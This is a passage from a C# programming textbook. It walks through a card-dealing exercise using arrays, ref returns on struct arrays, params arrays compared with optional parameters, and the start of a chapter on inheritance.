constructor, but thereafter you cannot change it.
The class contains a pair of methods named CardValue and CardSuit
that return this information, and it overrides the ToString method to
return a string representation of the card.
Note The CardValue and CardSuit methods are actually better
implemented as properties, which you learn how to do in Chapter
15.
9. Open the Pack.cs file in the Code and Text Editor window.
This file contains the Pack class, which models a pack of playing cards.
At the top of the Pack class are two public const int fields called
NumSuits and CardsPerSuit. These two fields specify the number of
suits in a pack of cards and the number of cards in each suit. The private
cardPack variable is a two-dimensional array of PlayingCard objects.
You will use the first dimension to specify the suit and the second
dimension to specify the value of the card in the suit. The
randomCardSelector variable is a random number generated based on
the Random class. You will use the randomCardSelector variable to
help shuffle the cards before they are dealt to each hand.
class Pack
{
public const int NumSuits = 4;
public const int CardsPerSuit = 13;
private PlayingCard[,] cardPack;
private Random randomCardSelector = new Random();
...
}
10. Locate the default constructor for the Pack class. Currently this
constructor is empty apart from a // TODO: comment. Delete the
comment, and add the following statement shown in bold to instantiate
the cardPack array with the appropriate values for each dimension:
public Pack()
{
this.cardPack = new PlayingCard[NumSuits, CardsPerSuit];
}
11. Add the following code shown in bold to the Pack constructor. These
statements populate the cardPack array with a full, sorted deck of cards.
public Pack()
{
this.cardPack = new PlayingCard[NumSuits, CardsPerSuit];
for (Suit suit = Suit.Clubs; suit <= Suit.Spades; suit++)
{
for (Value value = Value.Two; value <= Value.Ace;
value++)
{
this.cardPack[(int)suit, (int)value] = new
PlayingCard(suit, value);
}
}
}
The outer for loop iterates through the list of values in the Suit
enumeration, and the inner loop iterates through the values each card
can have in each suit. The inner loop creates a new PlayingCard object
of the specified suit and value and adds it to the appropriate element in
the cardPack array.
Note You must use one of the integer types as indexes into an
array. The suit and value variables are enumeration variables.
However, enumerations are based on the integer types, so it is safe
to cast them to int as shown in the code.
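As a quick illustration of this kind of cast (the variable names here are hypothetical):

Suit suit = Suit.Hearts;
int row = (int)suit; // Hearts is the third member of Suit, so row is 2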
12. Find the DealCardFromPack method in the Pack class. The purpose of
this method is to pick a random card from the pack, remove the card
from the pack to prevent it from being selected again, and then pass it
back as the return value from the method.
The first task in this method is to pick a suit at random. Delete the
comment and the statement that throws the NotImplementedException
exception from this method and replace them with the following
statement shown in bold:
public PlayingCard DealCardFromPack()
{
Suit suit = (Suit)randomCardSelector.Next(NumSuits);
}
This statement uses the Next method of the randomCardSelector random
number generator object to return a random number corresponding to a
suit. The parameter to the Next method specifies the exclusive upper
bound of the range to use; the value selected is between 0 and this value
minus 1. Note that the value returned is an int, so it has to be cast before
you can assign it to a Suit variable.
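For example, this short sketch (with a hypothetical generator variable) shows the range of values that Next can produce:

Random generator = new Random();
int n = generator.Next(4); // n is 0, 1, 2, or 3; it is never 4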
There is always the possibility that no cards of the selected suit are left.
You need to handle this situation and pick another suit if necessary.
13. After the code that selects a suit at random, add the while loop that
follows (shown in bold).
This loop calls the IsSuitEmpty method to determine whether any cards
of the specified suit are left in the pack (you will implement the logic for
this method shortly). If not, it picks another suit at random (it might
actually pick the same suit again) and checks again. The loop repeats the
process until it finds a suit with at least one card left.
public PlayingCard DealCardFromPack()
{
Suit suit = (Suit)randomCardSelector.Next(NumSuits);
while (this.IsSuitEmpty(suit))
{
suit = (Suit)randomCardSelector.Next(NumSuits);
}
}
14. You have now selected at random a suit with at least one card left. The
next task is to pick a card at random in this suit. You can use the random
number generator to select a card value, but as before, there is no
guarantee that the card with the chosen value has not already been dealt.
However, you can use the same idiom as before: call the
IsCardAlreadyDealt method (which you will examine and complete
later) to determine whether the card has already been dealt, and if so,
pick another card at random and try again, repeating the process until a
card is found. To do this, add the following statements shown in bold to
the DealCardFromPack method, after the existing code:
public PlayingCard DealCardFromPack()
{
...
Value value = (Value)randomCardSelector.Next(CardsPerSuit);
while (this.IsCardAlreadyDealt(suit, value))
{
value = (Value)randomCardSelector.Next(CardsPerSuit);
}
}
15. You have now selected a random playing card that has not been dealt
previously. Add the following code to the end of the
DealCardFromPack method to return this card and set the
corresponding element in the cardPack array to null:
public PlayingCard DealCardFromPack()
{
...
PlayingCard card = this.cardPack[(int)suit, (int)value];
this.cardPack[(int)suit, (int)value] = null;
return card;
}
16. Locate the IsSuitEmpty method. Remember that the purpose of this
method is to take a Suit parameter and return a Boolean value indicating
whether there are any more cards of this suit left in the pack. Delete the
comment and the statement that throws the NotImplementedException
exception from this method, and then add the following code shown in
bold:
private bool IsSuitEmpty(Suit suit)
{
bool result = true;
for (Value value = Value.Two; value <= Value.Ace; value++)
{
if (!IsCardAlreadyDealt(suit, value))
{
result = false;
break;
}
}
return result;
}
This code iterates through the possible card values and uses the
IsCardAlreadyDealt method (which you will complete in the next step)
to determine whether there is a card left in the cardPack array that has
the specified suit and value. If the loop finds a card, the value in the
result variable is set to false, and the break statement causes the loop to
terminate. If the loop completes without finding a card, the result
variable remains set to its initial value of true. The value of the result
variable is passed back as the return value of the method.
17. Find the IsCardAlreadyDealt method. The purpose of this method is to
determine whether the card with the specified suit and value has already
been dealt and removed from the pack. You will see later that when the
DealCardFromPack method deals a card, it removes the card from the
cardPack array and sets the corresponding element to null. Replace the
body of this method with the code shown in bold:
private bool IsCardAlreadyDealt(Suit suit, Value value) =>
    (this.cardPack[(int)suit, (int)value] == null);
This method returns true if the element in the cardPack array
corresponding to the suit and value is null, and it returns false otherwise.
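The => syntax makes this an expression-bodied method. It behaves exactly like the following block-bodied version:

private bool IsCardAlreadyDealt(Suit suit, Value value)
{
    return (this.cardPack[(int)suit, (int)value] == null);
}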
18. The next step is to add the selected playing card to a hand. Open the
Hand.cs file and display it in the Code and Text Editor window. This file
contains the Hand class, which implements a hand of cards (that is, all
cards dealt to one player).
This file contains a public const int field called HandSize, which is set to
the size of a hand of cards (13). It also contains an array of PlayingCard
objects, which is initialized by using the HandSize constant. The
playingCardCount field will be used by your code to keep track of how
many cards the hand currently contains as it is being populated.
class Hand
{
public const int HandSize = 13;
private PlayingCard[] cards = new PlayingCard[HandSize];
private int playingCardCount = 0;
...
}
The ToString method generates a string representation of the cards in the
hand. It uses a foreach loop to iterate through the items in the cards
array and calls the ToString method on each PlayingCard object it finds.
These strings are concatenated with a newline character in between
(using the Environment.NewLine constant to specify the newline
character) for formatting purposes.
public override string ToString()
{
string result = "";
foreach (PlayingCard card in this.cards)
{
result += $"{card.ToString()}{Environment.NewLine}";
}
return result;
}
19. Locate the AddCardToHand method in the Hand class. The purpose of
this method is to add the playing card specified as the parameter to the
hand. Delete the comment, and then add the following statements shown in
bold to this method:
public void AddCardToHand(PlayingCard cardDealt)
{
if (this.playingCardCount >= HandSize)
{
throw new ArgumentException("Too many cards");
}
this.cards[this.playingCardCount] = cardDealt;
this.playingCardCount++;
}
This code first checks to ensure that the hand is not already full. If the
hand is full, it throws an ArgumentException exception (this should
never occur, but it is good practice to be safe). Otherwise, the card is
added to the cards array at the index specified by the playingCardCount
variable, and this variable is then incremented.
20. In Solution Explorer, expand the MainPage.xaml node and then open the
MainPage.xaml.cs file in the Code and Text Editor window.
This is the code for the Card Game window. Locate the dealClick
method. This method runs when the user clicks the Deal button.
Currently, it contains an empty try block and an exception handler that
displays a message if an exception occurs.
21. Delete the comment, and then add the following statement shown in bold to
the try block:
private void dealClick(object sender, RoutedEventArgs e)
{
try
{
pack = new Pack();
}
catch (Exception ex)
{
...
}
}
This statement simply creates a new pack of cards. You saw earlier that
this class contains a two-dimensional array holding the cards in the
pack, and the constructor populates this array with the details of each
card. You now need to create four hands of cards from this pack.
22. Add the following statements shown in bold to the try block:
try
{
pack = new Pack();
for (int handNum = 0; handNum < NumHands; handNum++)
{
hands[handNum] = new Hand();
}
}
catch (Exception ex)
{
...
}
This for loop creates four hands from the pack of cards and stores them
in an array called hands. Each hand is initially empty, so you need to
deal the cards from the pack to each hand.
23. Add the following code shown in bold to the for loop:
try
{
...
for (int handNum = 0; handNum < NumHands; handNum++)
{
hands[handNum] = new Hand();
for (int numCards = 0; numCards < Hand.HandSize;
numCards++)
{
PlayingCard cardDealt = pack.DealCardFromPack();
hands[handNum].AddCardToHand(cardDealt);
}
}
}
catch (Exception ex)
{
...
}
The inner for loop populates each hand by using the
DealCardFromPack method to retrieve a card at random from the pack
and the AddCardToHand method to add this card to a hand.
24. Add the following code shown in bold after the outer for loop:
try
{
...
for (int handNum = 0; handNum < NumHands; handNum++)
{
...
}
north.Text = hands[0].ToString();
south.Text = hands[1].ToString();
east.Text = hands[2].ToString();
west.Text = hands[3].ToString();
}
catch (Exception ex)
{
...
}
When all the cards have been dealt, this code displays each hand in the
text boxes on the form. These text boxes are called north, south, east,
and west. The code uses the ToString method of each hand to format the
output.
If an exception occurs at any point, the catch handler displays a message
box with the error message for the exception.
25. On the Debug menu, click Start Debugging. When the Card Game
window appears, expand the command bar and click Deal.
The cards in the pack should be dealt at random to each hand, and the
cards in each hand should be displayed on the form, similar to what is shown
in the following image:
26. Click Deal again. Verify that a new set of hands is dealt and the cards in
each hand change.
27. Return to Visual Studio and stop debugging.
Accessing arrays that contain value types
You can think of an array as a simple collection of data, ordered by an index.
You can easily retrieve an item if you know its index, but if you want to find
data based on some other attribute, then you typically have to implement a
helper method that performs the search and returns the index of the required
item.
As an example, consider the following code that creates an array of
Person objects, where Person is a class:
class Person
{
public string Name;
public int Age;
public Person(string name, int age)
{
this.Name = name;
this.Age = age;
}
}
...
Person[] family = new[] {
new Person("John", 53),
new Person("Diana", 53),
new Person("James", 26),
new Person("Francesca", 23)
};
You want to find the youngest member of the family in the Person array,
so you write the following method:
Person findYoungest()
{
int youngest = 0;
for (int i = 1; i < family.Length; i++)
{
if (family[i].Age < family[youngest].Age)
{
youngest = i;
}
}
return family[youngest];
}
You can then call this method and display the results in the following
manner:
var mostYouthful = findYoungest();
Console.WriteLine($"Name: {mostYouthful.Name}, Age:
{mostYouthful.Age}");
Hopefully, this displays the following result:
Name: Francesca, Age: 23
This is all very satisfactory and works well. Next, you decide that you
want to update the age of the youngest family member (Francesca has just
had her birthday and is now 24), so you write the following statement:
mostYouthful.Age++;
Finally, to confirm that everything has been changed correctly, you use
the following statements to iterate through the family array and display its
contents:
foreach (Person familyMember in family)
{
Console.WriteLine($"Name: {familyMember.Name}, Age:
{familyMember.Age}");
}
You are pleased to observe that the results are correct, and Francesca’s
age has been modified:
Name: John, Age: 53
Name: Diana, Age: 53
Name: James, Age: 26
Name: Francesca, Age: 24
At this point, you have a rethink about the Person class and decide it
should really be a struct, so you change it:
struct Person
{
public string Name;
public int Age;
public Person(string name, int age)
{
this.Name = name;
this.Age = age;
}
}
Your code compiles and runs, but you notice that Francesca’s age is no
longer being updated; the output of the foreach loop looks like this:
Name: John, Age: 53
Name: Diana, Age: 53
Name: James, Age: 26
Name: Francesca, Age: 23
The issue is that you have converted a reference type into a value type.
The data in the family array has changed from being a set of references to
objects on the heap to copies of data on the stack. The value returned by the
findYoungest method was originally a reference to a Person object, and the
increment operation on the Age field made through that reference updated the
original object on the heap. Now the family array contains value types, and
the value returned by the findYoungest method is a copy of the item in the
array rather than a reference. So, when the increment operation is performed
on the Age field, this operation updates a copy of the Person and not the item
stored in the family array.
To handle this situation, you can amend the findYoungest method to
explicitly return a reference to the value type rather than a copy. You can
achieve this by using the ref keyword, as follows:
ref Person findYoungest()
{
int youngest = 0;
for (int i = 1; i < family.Length; i++)
{
if (family[i].Age < family[youngest].Age)
{
youngest = i;
}
}
return ref family[youngest];
}
Note that most of the code is unchanged. The return type of the method
has changed to ref Person (a reference to a Person), and the return statement
similarly states that it passes back a reference to the youngest item in the
family array.
When you call the method, you must make a couple of corresponding
changes:
ref var mostYouthful = ref findYoungest();
These modifications indicate that mostYouthful is a reference to an item in
the family array. You access the fields in this item in the same way as before;
the C# compiler knows that it should dereference the data through the
variable. The result is that the increment statement below updates the data in
the array rather than a copy:
mostYouthful.Age++;
When you print out the contents of the array, Francesca’s age has
changed:
foreach (Person familyMember in family)
{
Console.WriteLine($"Name: {familyMember.Name}, Age:
{familyMember.Age}");
}
Name: John, Age: 53
Name: Diana, Age: 53
Name: James, Age: 26
Name: Francesca, Age: 24
Returning reference data from a method in this way is a powerful
technique, but you must treat it with care. You can only return a reference to
data that still exists when the method has finished, such as an element in an
array. For example, you cannot return a reference to a local variable created
on the stack by the method:
// Don't try this; it won't compile
ref int danglingReference()
{
int i;
... // Calculate a value using i
return ref i;
}
This was a common problem in older C programs, known as a “dangling
reference.” Fortunately, the C# compiler prevents you from committing
errors such as this!
Summary
In this chapter, you learned how to create and use arrays to manipulate sets of
data. You saw how to declare and initialize arrays, access data held in arrays,
pass arrays as parameters to methods, and return arrays from methods. You
also learned how to create multidimensional arrays and how to use arrays of
arrays.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 11.
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference

To: Declare an array variable
Do this: Write the name of the element type, followed by square brackets, followed by the name of the variable, followed by a semicolon. For example:

bool[] flags;

To: Create an instance of an array
Do this: Write the keyword new, followed by the name of the element type, followed by the size of the array enclosed in square brackets. For example:

bool[] flags = new bool[10];

To: Initialize the elements of an array to specific values
Do this: For an array, write the specific values in a comma-separated list enclosed in braces. For example:

bool[] flags = { true, false, true, false };

To: Find the number of elements in an array
Do this: Use the Length property. For example:

bool[] flags = ...;
...
int noOfElements = flags.Length;

To: Access a single array element
Do this: Write the name of the array variable, followed by the integer index of the element enclosed in square brackets. Remember, array indexing starts at 0, not 1. For example:

bool initialElement = flags[0];

To: Iterate through the elements of an array
Do this: Use a for statement or a foreach statement. For example:

bool[] flags = { true, false, true, false };
for (int i = 0; i < flags.Length; i++)
{
    Console.WriteLine(flags[i]);
}
foreach (bool flag in flags)
{
    Console.WriteLine(flag);
}

To: Declare a multidimensional array variable
Do this: Write the name of the element type, followed by a set of square brackets with a comma separator indicating the number of dimensions, followed by the name of the variable, followed by a semicolon. For example, use the following to create a two-dimensional array called table and initialize it to hold 4 rows of 6 columns:

int[,] table;
table = new int[4,6];

To: Declare a jagged array variable
Do this: Declare the variable as an array of child arrays. You can initialize each child array to have a different length. For example, use the following to create a jagged array called items and initialize each child array:

int[][] items;
items = new int[4][];
items[0] = new int[3];
items[1] = new int[10];
items[2] = new int[40];
items[3] = new int[25];
CHAPTER 11
Understanding parameter arrays
After completing this chapter, you will be able to:
Write a method that can accept any number of arguments by using the
params keyword.
Write a method that can accept any number of arguments of any type
by using the params keyword in combination with the object type.
Explain the differences between methods that take parameter arrays
and methods that take optional parameters.
Parameter arrays are useful if you want to write methods that can take any
number of arguments, possibly of different types, as parameters. If you are
familiar with object-oriented concepts, you might be grinding your teeth in
frustration at the previous sentence. After all, the object-oriented approach to
solving this problem is to define overloaded methods. However, overloading
is not always the most suitable approach, especially if you need to create a
method that can take a truly variable number of parameters, each of which
might vary in type whenever the method is invoked. This chapter describes
how you can use parameter arrays to address situations such as this.
Overloading—a recap
Overloading is the technical term for declaring two or more methods with the
same name in the same scope. Overloading a method is very useful for cases
in which you want to perform the same action on arguments of different
types. The classic example of overloading in Microsoft Visual C# is the
Console.WriteLine method. This method is overloaded numerous times so
that you can pass any primitive type argument. The following code example
illustrates some of the ways in which the WriteLine method is defined in the
Console class:
class Console
{
public static void WriteLine(Int32 value)
public static void WriteLine(Double value)
public static void WriteLine(Decimal value)
public static void WriteLine(Boolean value)
public static void WriteLine(String value)
...
}
Note The documentation for the WriteLine method uses the structure
types defined in the System namespace for its parameters rather than the
C# aliases for these types. For example, the overload that prints out the
value for an int actually takes an Int32 as the parameter. Refer to
Chapter 9, “Creating value types with enumerations and structures,” for
a list of the structure types and their mappings to C# aliases for these
types.
As useful as overloading is, it doesn’t cover every case. In particular,
overloading doesn’t easily handle a situation in which the type of parameters
doesn’t vary, but the number of parameters does. For example, what if you
want to write many values to the console? Do you have to provide versions of
Console.WriteLine that can take two parameters of various combinations,
other versions that can take three parameters, and so on? That would quickly
become tedious. And wouldn’t the massive duplication of these overloaded
methods worry you? It should. Fortunately, there is a way to write a method
that takes a variable number of arguments (a variadic method): you can use a
parameter array, which is declared by using the params keyword.
To understand how params arrays solve this problem, it helps first to
understand the uses and shortcomings of ordinary arrays.
Using array arguments
Suppose that you want to write a method to determine the minimum value in
a set of values passed as parameters. One way is to use an array. For
example, to find the smallest of several int values, you could write a static
method named Min with a single parameter representing an array of int
values:
class Util
{
    public static int Min(int[] paramList)
    {
        // Verify that the caller has provided at least one parameter.
        // If not, throw an ArgumentException exception - it is not possible
        // to find the smallest value in an empty list.
        if (paramList == null || paramList.Length == 0)
        {
            throw new ArgumentException("Util.Min: not enough arguments");
        }

        // Set the current minimum value found in the list of parameters to the first item
        int currentMin = paramList[0];

        // Iterate through the list of parameters, searching to see whether any of them
        // are smaller than the value held in currentMin
        foreach (int i in paramList)
        {
            // If the loop finds an item that is smaller than the value held in
            // currentMin, then set currentMin to this value
            if (i < currentMin)
            {
                currentMin = i;
            }
        }

        // At the end of the loop, currentMin holds the value of the smallest
        // item in the list of parameters, so return this value.
        return currentMin;
    }
}
Note The ArgumentException class is specifically designed to be
thrown by a method if the arguments supplied do not meet the
requirements of the method.
To use the Min method to find the minimum of two int variables named
first and second, you can write this:
int[] array = new int[2];
array[0] = first;
array[1] = second;
int min = Util.Min(array);
And to use the Min method to find the minimum of three int variables
(named first, second, and third), you can write this:
int[] array = new int[3];
array[0] = first;
array[1] = second;
array[2] = third;
int min = Util.Min(array);
You can see that this solution avoids the need for a large number of
overloads, but it does so at a price: you have to write additional code to
populate the array that you pass in. You can, of course, use an anonymous
array if you prefer, like this:
int min = Util.Min(new int[] {first, second, third});
However, the point is that you still need to create and populate an array,
and the syntax can get a little confusing. The solution is to get the compiler to
write some of this code for you by using a params array as the parameter to
the Min method.
Declaring a params array
Using a params array, you can pass a variable number of arguments to a
method. You indicate a params array by using the params keyword as an
array parameter modifier when you define the method parameters. For
example, here’s Min again—this time with its array parameter declared as a
params array:
class Util
{
public static int Min(params int[] paramList)
{
// code exactly as before
}
}
The effect of the params keyword on the Min method is that it allows you
to call the method by using any number of integer arguments without
worrying about creating an array. For example, to find the minimum of two
integer values, you can simply write this:
int min = Util.Min(first, second);
The compiler translates this call into code similar to this:
int[] array = new int[2];
array[0] = first;
array[1] = second;
int min = Util.Min(array);
To find the minimum of three integer values, you write the code shown
here, which is also converted by the compiler to the corresponding code that
uses an array:
int min = Util.Min(first, second, third);
Both calls to Min (one call with two arguments and the other with three
arguments) resolve to the same Min method with the params keyword. And,
as you can probably guess, you can call this Min method with any number of
int arguments. The compiler just counts the number of int arguments, creates
an int array of that size, fills the array with the arguments, and then calls the
method by passing the single array parameter.
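For instance, a call with four arguments is compiled along these lines (the values here are hypothetical):

int min = Util.Min(9, 3, 7, 2);
// is translated by the compiler into the equivalent of:
// int[] array = new int[4] { 9, 3, 7, 2 };
// int min = Util.Min(array); // returns 2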
Note If you’re a C or C++ programmer, you might recognize params as
a type-safe equivalent of the varargs macros from the header file
stdarg.h. Java also has a varargs facility that operates similarly to the
params keyword in C#.
There are several points worth noting about params arrays:
You can’t use the params keyword with multidimensional arrays. The
code in the following example will not compile:
// compile-time error
public static int Min(params int[,] table)
...
You can’t overload a method based solely on the params keyword. The
params keyword does not form part of a method’s signature, as shown
in this example. Here, the compiler would not be able to distinguish
between these methods in code that calls them:
// compile-time error: duplicate declaration
public static int Min(int[] paramList)
...
public static int Min(params int[] paramList)
...
You’re not allowed to specify the ref or out modifier with params
arrays, as shown in this example:
// compile-time errors
public static int Min(ref params int[] paramList)
...
public static int Min(out params int[] paramList)
...
A params array must be the last parameter. (This means that you can
have only one params array per method.) Consider this example:
// compile-time error
public static int Min(params int[] paramList, int i)
...
A non-params method always takes priority over a params method.
This means that you can still create an overloaded version of a method
for the common cases, such as in the following example:
public static int Min(int leftHandSide, int rightHandSide)
...
public static int Min(params int[] paramList)
...
The first version of the Min method is used when it’s called using two
int arguments. The second version is used if any other number of int
arguments is supplied. This includes the case in which the method is
called with no arguments. Adding the non-params array method might
be a useful optimization technique because the compiler won’t have to
create and populate so many arrays.
Using params object[ ]
A parameter array of type int is very useful. With it, you can pass any number
of int arguments in a method call. However, what if not only the number of
arguments varies but also the argument type? C# has a way to solve this
problem, too. The technique is based on the facts that object is the root of all
classes and that the compiler can generate code that converts value types
(things that aren’t classes) to objects by using boxing, as described in Chapter
8, “Understanding values and references.” You can use a parameters array of
type object to declare a method that accepts any number of object arguments,
allowing the arguments passed in to be of any type. Look at this example:
class Black
{
public static void Hole(params object[] paramList)
...
}
I’ve called this method Black.Hole because no argument can escape from
it:
You can pass the method no arguments at all, in which case the
compiler will pass an object array whose length is 0:
Black.Hole(); // converted to Black.Hole(new object[0]);
You can call the Black.Hole method by passing null as the argument.
An array is a reference type, so you’re allowed to initialize an array
with null:
Black.Hole(null);
You can pass the Black.Hole method an actual array. In other words,
you can manually create the array normally generated by the compiler:
object[] array = new object[2];
array[0] = "forty two";
array[1] = 42;
Black.Hole(array);
You can pass the Black.Hole method arguments of different types and
these arguments will automatically be wrapped inside an object array:
Black.Hole("forty two", 42);
//converted to Black.Hole(new object[]{"forty two", 42});
The Console.WriteLine method
The Console class contains many overloads for the WriteLine method.
One of these overloads looks like this:
public static void WriteLine(string format, params object[] arg);
Although string interpolation has very nearly made this version of
the WriteLine method redundant, this overload was frequently used in
previous editions of the C# language. This overload enables the
WriteLine method to support a format string argument that contains
numeric placeholders, each of which can be replaced at runtime with a
variable of any type that is specified as a list of parameters (placeholder
{i} is replaced with the ith variable in the list that follows). Here's an
example of a call to this method (the variables fname and lname are
strings, mi is a char, and age is an int):
Console.WriteLine("Forename:, Middle Initial:, Last name:,
Age:", fname, mi, lname, age);
The compiler resolves this call into the following:
Console.WriteLine("Forename:, Middle Initial:, Last name:,
Age:", new object[4]{fname, mi, lname, age});
Using a params array
In the following exercise, you will implement and test a static method named
Sum. The purpose of this method is to calculate the sum of a variable number
of int arguments passed to it, returning the result as an int. You will do this
by writing Sum to take a params int[] parameter. You will implement two
checks on the params parameter to ensure that the Sum method is completely
robust. You will then call the Sum method with a variety of different
arguments to test it.
Write a params array method
1. Start Microsoft Visual Studio 2017 if it is not already running.
2. Open the ParamsArray solution, which is located in the \Microsoft
Press\VCSBS\Chapter 11\ParamsArray folder in your Documents
folder.
The ParamsArray project contains the Program class in the Program.cs
file, including the doWork method framework that you have seen in
previous chapters. You will implement the Sum method as a static
method of another class called Util (short for “utility”), which you will
add to the project.
3. In Solution Explorer, right-click the ParamsArray project in the
ParamsArray solution, point to Add, and then click Class.
4. In the Add New Item—ParamsArray dialog box, in the middle pane,
click the Class template. In the Name box, type Util.cs, and then click
Add.
The Util.cs file is created and added to the project. It contains an empty
class named Util in the ParamsArray namespace.
5. Add a public static method named Sum to the Util class. This method
should return an int and accept a params array of int values named
paramList. It should look like this:
public static int Sum(params int[] paramList)
{
}
The first step in implementing the Sum method is to check the paramList
parameter. Apart from containing a valid set of integers, it can also be
null or it can be an array of zero length. In both of these cases, it is
difficult to calculate the sum, so the best option is to throw an
ArgumentException exception. (You could argue that the sum of the
integers in a zero-length array is 0, but you’ll treat this situation as an
exception in this example.)
6. Add the following code shown in bold to Sum. This code throws an
ArgumentException exception if paramList is null. The Sum method
should now look like this:
public static int Sum(params int[] paramList)
{
if (paramList == null)
{
throw new ArgumentException("Util.Sum: null parameter list");
}
}
7. Add code to the Sum method to throw an ArgumentException exception
if the length of the parameter list array is 0, as shown here in bold:
public static int Sum(params int[] paramList)
{
if (paramList == null)
{
throw new ArgumentException("Util.Sum: null parameter
list");
}
if (paramList.Length == 0)
{
throw new ArgumentException("Util.Sum: empty parameter
list");
}
}
If the array passes these two tests, the next step is to add together all the
elements inside the array. You can use a foreach statement to do this,
and you will need a local variable to hold the running total.
8. Declare an integer variable named sumTotal and initialize it to 0,
directly following the code from the preceding step.
public static int Sum(params int[] paramList)
{
...
if (paramList.Length == 0)
{
throw new ArgumentException("Util.Sum: empty parameter
list");
}
int sumTotal = 0;
}
9. Add a foreach statement to the Sum method to iterate through the
paramList array. The body of this foreach loop should add each element
in the array to sumTotal. At the end of the method, return the value of
sumTotal by using a return statement, as shown in bold here:
public static int Sum(params int[] paramList)
{
...
int sumTotal = 0;
foreach (int i in paramList)
{
sumTotal += i;
}
return sumTotal;
}
10. On the Build menu, click Build Solution, and then confirm that your
solution builds without any errors.
Test the Util.Sum method
1. Display the Program.cs file in the Code and Text Editor window.
2. In the Code and Text Editor window, delete the // TODO: comment and
add the following statement to the doWork method:
Console.WriteLine(Util.Sum(null));
3. On the Debug menu, click Start Without Debugging.
The program builds and runs, writing the following message to the
console:
Exception: Util.Sum: null parameter list
This confirms that the first check in the method works.
4. Press the Enter key to close the program and return to Visual Studio
2017.
5. In the Code and Text Editor window, change the call to
Console.WriteLine in doWork as shown here:
Console.WriteLine(Util.Sum());
This time, the method is called without any arguments. The compiler
translates the empty argument list into an empty array.
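In other words, the call is compiled as if you had written this:

Console.WriteLine(Util.Sum(new int[0]));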
6. On the Debug menu, click Start Without Debugging.
The program builds and runs, writing the following message to the
console:
Exception: Util.Sum: empty parameter list
This confirms that the second check in the method works.
7. Press the Enter key to close the program and return to Visual Studio
2017.
8. Change the call to Console.WriteLine in doWork as follows:
Console.WriteLine(Util.Sum(10, 9, 8, 7, 6, 5, 4, 3, 2, 1));
9. On the Debug menu, click Start Without Debugging.
Verify that the program builds, runs, and writes the value 55 to the
console.
10. Press Enter to close the application and return to Visual Studio 2017.
Comparing parameter arrays and optional parameters
Chapter 3, “Writing methods and applying scope,” illustrates how to define
methods that take optional parameters. At first glance, it appears there is a
degree of overlap between methods that use parameter arrays and methods
that take optional parameters. However, there are fundamental differences
between them:
A method that takes optional parameters still has a fixed parameter list,
and you cannot pass an arbitrary list of arguments. The compiler
generates code that inserts the default values onto the stack for any
missing arguments before the method runs, and the method is not
aware of which of the arguments are provided by the caller and which
are compiler-generated defaults.
A method that uses a parameter array effectively has a completely
arbitrary list of parameters, and none of them has a default value.
Furthermore, the method can determine exactly how many arguments
the caller provided.
Generally, you use parameter arrays for methods that can take any number
of parameters (including none), whereas you use optional parameters only
where it is not convenient to force a caller to provide an argument for every
parameter.
There is one further situation worth pondering. If you define a method that
takes a parameter list and provide an overload that takes optional parameters,
it is not always immediately apparent which version of the method will be
called if the argument list in the calling statement matches both method
signatures. You will investigate this scenario in the final exercise in this
chapter.
Compare a params array and optional parameters
1. Return to the ParamsArray solution in Visual Studio 2017 and display
the Util.cs file in the Code and Text Editor window.
2. Add the following Console.WriteLine statement shown in bold to the
start of the Sum method in the Util class:
public static int Sum(params int[] paramList)
{
Console.WriteLine("Using parameter list");
...
}
3. Add another implementation of the Sum method to the Util class. This
version should take four optional int parameters, each with a default
value of 0. In the body of the method, output the message “Using
optional parameters,” and then calculate and return the sum of the four
parameters. The completed method should look like the following code
in bold:
class Util
{
...
public static int Sum(int param1 = 0, int param2 = 0, int param3 = 0, int param4 = 0)
{
Console.WriteLine("Using optional parameters");
int sumTotal = param1 + param2 + param3 + param4;
return sumTotal;
}
}
4. Display the Program.cs file in the Code and Text Editor window.
5. In the doWork method, comment out the existing code then add the
following statement:
Console.WriteLine(Util.Sum(2, 4, 6, 8));
This statement calls the Sum method, passing four int parameters. This
call matches both overloads of the Sum method.
6. On the Debug menu, click Start Without Debugging to build and run the
application.
When the application runs, it displays the following messages:
Using optional parameters
20
In this case, the compiler-generated code that called the method that
takes four optional parameters. This is the version of the method that
most closely matches the method call.
7. Press Enter and return to Visual Studio.
8. In the doWork method, change the statement that calls the Sum method
and remove the final argument (8), as shown here:
Console.WriteLine(Util.Sum(2, 4, 6));
9. On the Debug menu, click Start Without Debugging to build and run the
application.
When the application runs, it displays the following messages:
Using optional parameters
12
The compiler still generated code that called the method that takes
optional parameters, even though the method signature does not exactly
match the call. Given a choice between a method that takes optional
parameters and a method that takes a parameter list, the C# compiler
will use the method that takes optional parameters.
10. Press Enter and return to Visual Studio.
11. In the doWork method, change the statement that calls the Sum method
again and add two more arguments:
Console.WriteLine(Util.Sum(2, 4, 6, 8, 10));
12. On the Debug menu, click Start Without Debugging to build and run the
application.
When the application runs, it displays the following messages:
Using parameter list
30
This time, more arguments are provided than the method that takes
optional parameters specifies, so the compiler-generated code that calls
the method that takes a parameter array.
13. Press Enter and return to Visual Studio.
Summary
In this chapter, you learned how to use a params array to define a method
that can take any number of arguments. You also saw how to use a params
array of object types to create a method that accepts any number of
arguments of any type. Also, you saw how the compiler resolves method
calls when it has a choice between calling a method that takes a parameter
array and a method that takes optional parameters.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 12, “Working with inheritance.”
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference

To: Write a method that accepts any number of arguments of a given type
Do this: Write a method whose parameter is a params array of the given type. For example, a method that accepts any number of bool arguments is declared like this:

someType Method(params bool[] flags)
{
    ...
}

To: Write a method that accepts any number of arguments of any type
Do this: Write a method whose parameter is a params array whose elements are of type object. For example:

someType Method(params object[] paramList)
{
    ...
}
CHAPTER 12
Working with inheritance
After completing this chapter, you will be able to:
Create a derived class that inherits features from a base class.
Control method hiding and overriding by using the new, virtual, and
override keywords.
Limit accessibility within an inheritance hierarchy by using the
protected keyword.
Define extension methods as an alternative mechanism to using
inheritance.
Inheritance is a key concept in the world of object-oriented programming.
You can use inheritance as a tool to avoid repetition when defining different
classes that have some features in common and are quite clearly related to
one another. Perhaps they are different classes of the same type, each with its
own distinguishing feature—for example, managers, manual workers, and all
employees of a factory. If you were writing an application to simulate the
factory, how would you specify that managers and manual workers have
some features that are the same but also have features that are different? For
example, they all have an employee reference number, but managers have
different responsibilities and perform tasks different from those of manual
workers.
This is where inheritance proves useful.
What is inheritance?
